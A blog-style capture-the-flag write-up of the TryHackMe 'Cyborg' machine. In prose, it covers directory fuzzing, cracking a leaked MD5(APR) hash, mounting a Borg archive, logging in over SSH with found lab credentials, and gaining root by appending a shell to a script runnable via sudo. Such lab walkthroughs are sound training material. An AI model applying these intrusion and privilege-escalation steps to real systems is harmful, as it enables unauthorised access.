Today we are doing the CTF “Cyborg” on THM. This is an easy machine and includes “encrypted archives, source code analysis and more”. I did this once awhile ago but wanted to post a write up since this is unusual in that it includes third-party tools that we have to learn if we expect to capture the flags.
We start off with a port scan with default scripts to take a peek. While this run I usually fuzz directories with gobuster. Right off the bat we have an /admin and /etc directory we’ll visit in just a moment…
The URL brings us to a default Apache index so checking etc we see a squid directory which includes a config file and password hash.
Checking out the /admin directory we are able to download an archive., but we also find an interesting message on the Admin Panel…
So we can assume the Squid proxy config might come into play later. After extracting the downloaded archive, we see there are some hints and a README file. Peeking at the README tells us this uses Borg Backup to create the archive. Now, I have not had any experience with Borg so I decided to look at the documentation on viewing archives. I installed with apt install borgbackup since I run a Debian derivative system, and review my options.
Now this took a bit of trial and error but moving up a directory to /dev, I am prompted with a passphrase to mount the archive. I got this command to mount it from the documentation for Borg, as we do not know all the files to mount but do want all of them from the repo. I also know there was the hashed password for the “music_archive” under the /etc directory we can crack.
First I tried to crack this has as a regular MD5, but using hash-identifier I discovered it was MD5(APR) instead. Changing the hash type in hashcat and running….we get the password!
After putting in our password “squidward” to mount the Borg repo, we browse around. There is a user ‘Alex’ with not a whole lot on his profile. We do find a username: password combo of ‘alex:S3cretP@s3’. Seeing as SSH was open we can try these creds to connect to the machine and…it works! His user flag is in his home directory.
Now we need to escalate privileges. Here I can check cron jobs, binaries that have active SUID bits, and special user permissions. We did find something interesting here. He is able to run backup.sh as root without a password. If we can get that to spawn a shell as root we will be set.
Unfortunately we don’t have permissions to modify the file as is. But Alex is able to use chmod to change the permissions of the file, allowing us to append a shell spawn at the bottom of the script!
Then its as simple as running the script and moving to the root directory to grab the root flag!
Thank you all for reading!